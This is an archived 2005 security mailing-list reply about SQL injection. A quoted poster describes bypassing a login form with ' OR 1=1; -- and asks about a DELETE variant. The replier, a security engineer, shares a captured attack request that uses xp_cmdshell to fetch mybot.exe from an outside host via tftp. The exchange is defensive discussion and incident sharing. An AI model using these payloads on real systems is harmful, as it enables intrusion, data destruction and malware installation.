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Re: SQL injection

From: James Riden <j.riden () massey ac nz>
Date: Wed, 19 Jan 2005 20:34:16 +1300

"Francesco" <francesco () blackcoil com> writes:

I have just discovered that I can successfully inject the following SQL:

' OR 1=1; --

into the Username field of a logon form on a "secure" site in my
corporate network (Windows 2000, SQL 7.0).  When I do this, leaving the
password field blank, I am logged into the system as the first user in
the "Users" table in the DB which is being authenticated against.  LOL.

If I can get that far, can't I theoretically:

' OR 1=1; DELETE Users; --

or something similar?  Couldn't I EXEC some system sprocs this way too? 
How much damage/rooting can be done here?  I need to present a detailed
report to the admins.

Captured here - unsuccessful incidentally - an attack from 24.1.xx.yy

GET /foo.asp?bar=baz';%20exec%20master..xp_cmdshell%20'tftp%20-i%2024.1.xx.yy%20get%20mybot.exe%20C:%5Carcld.exe'-- 

(The '..' between 'master' and 'xp_cmdshell' is 2E 2E hex.)

I don't know what mybot.exe was, but it's probably not good :)

James Riden / j.riden () massey ac nz / Systems Security Engineer
GPG public key available at: http://www.massey.ac.nz/~jriden/
This post does not necessarily represent the views of my employer.

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